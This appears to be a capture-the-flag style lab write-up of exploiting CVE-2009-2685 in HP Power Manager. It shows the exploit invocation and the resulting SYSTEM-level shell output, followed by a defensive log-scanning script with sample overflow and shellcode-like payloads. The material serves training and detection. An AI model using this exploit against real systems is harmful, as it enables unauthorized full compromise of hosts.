CVE-2009-2685


The target web application, HP Power Manager, might be vulnerable to CVE-2009-2685, as it appears to be an outdated instance.

Exploitation


Executing the modified Python exploit script

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/kevin]
└─$ python2 CVE-2009-2685.py $IP
 
##//#############################################################################################################
##							##							#
## Vulnerability: HP Power Manager 'formExportDataLogs' ##  FormExportDataLogs Buffer Overflow	 		#
## 							##  HP Power Manager				 	#
## Vulnerable Application: HP Power Manager	 	##  This is a part of the Metasploit Module, 		#
## Tested on Windows [Version 6.1.7600] 		##  exploit/windows/http/hp_power_manager_filename	#
##							##							#
## Author: Muhammad Haidari				##  Spawns a shell to same window			#
## Contact: ghmh@outlook.com				##							#
## Website: www.github.com/muhammd			##							#
##							##							#
##//#############################################################################################################
##
##
## TODO: adjust 
##
## Usage: python hpm_exploit.py <Remote IP Address>
 
[+] Payload Fired... She will be back in less than a min...
[+] Give me 30 Sec!
(UNKNOWN) [192.168.221.45] 1234 (?) open
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
 
C:\Windows\system32> whoami
 whoami
nt authority\system
 
C:\Windows\system32> hostname
 hostname
kevin
 
C:\Windows\system32> ipconfig
 ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Local Area Connection 2:
 
   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::e080:ee0d:fa86:17a%15
   IPv4 Address. . . . . . . . . . . : 192.168.221.45
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.221.254
 
Tunnel adapter Reusable ISATAP Interface {AD5249E3-105D-452D-AF94-6E3E29548657}:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
 
Tunnel adapter Teredo Tunneling Pseudo-Interface:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

The exploit executed successfully: an initial foothold on the target was established as NT AUTHORITY\SYSTEM, i.e. a system-level compromise.
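On the defensive side, an attempt against the formExportDataLogs handler stands out in web-server or proxy logs because the overflow needs a form field far longer than any legitimate export request, and the payload carries non-printable bytes. The check below is an added example written for this page, not code from the exploit script or from HP; the request path, the field name and the length threshold are assumptions, and the sample requests are constructed.

```python
from urllib.parse import unquote_to_bytes

# Assumed threshold (hypothetical; tune to the deployment): legitimate values
# posted to this form are short file names, the overflow needs a very long one.
MAX_FIELD_LEN = 256
# Handler name taken from the CVE description; the exact URL path is not on the page.
TARGET_HANDLER = "formExportDataLogs"


def parse_form_body(body: str) -> dict:
    """Split an application/x-www-form-urlencoded body into {field: raw bytes}.

    Values are kept as bytes (not decoded to str) so that shellcode-like
    percent-encoded bytes survive intact for inspection.
    """
    fields = {}
    for pair in body.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        fields[unquote_to_bytes(name).decode("latin-1")] = unquote_to_bytes(value)
    return fields


def check_request(method: str, path: str, body: str, max_len: int = MAX_FIELD_LEN) -> list:
    """Return (field, reason) findings for one request; an empty list means nothing suspicious."""
    if TARGET_HANDLER not in path:
        return []
    findings = []
    for name, raw in parse_form_body(body).items():
        if len(raw) > max_len:
            findings.append((name, f"value length {len(raw)} exceeds {max_len}"))
        if any(b < 0x20 or b > 0x7E for b in raw):
            findings.append((name, "non-printable bytes in value"))
    return findings


def scan(requests) -> list:
    """Run check_request over (method, path, body) tuples and keep only flagged requests."""
    return [(path, check_request(m, path, b)) for m, path, b in requests if check_request(m, path, b)]


# Constructed sample requests (not real captures); "fileName" is an assumed field name.
SAMPLE_REQUESTS = [
    ("POST", "/formExportDataLogs", "fileName=export.csv"),          # benign
    ("POST", "/formExportDataLogs", "fileName=" + "A" * 1200),       # oversized field
    ("POST", "/formExportDataLogs", "fileName=%90%90%90%cc"),         # binary bytes
    ("GET", "/index.htm", ""),                                        # unrelated
]

if __name__ == "__main__":
    for path, findings in scan(SAMPLE_REQUESTS):
        print(path, findings)
```

Tune the length threshold to the longest value seen in normal use of the export form, and alert on a single hit: there is no legitimate reason for a multi-kilobyte or binary file name here.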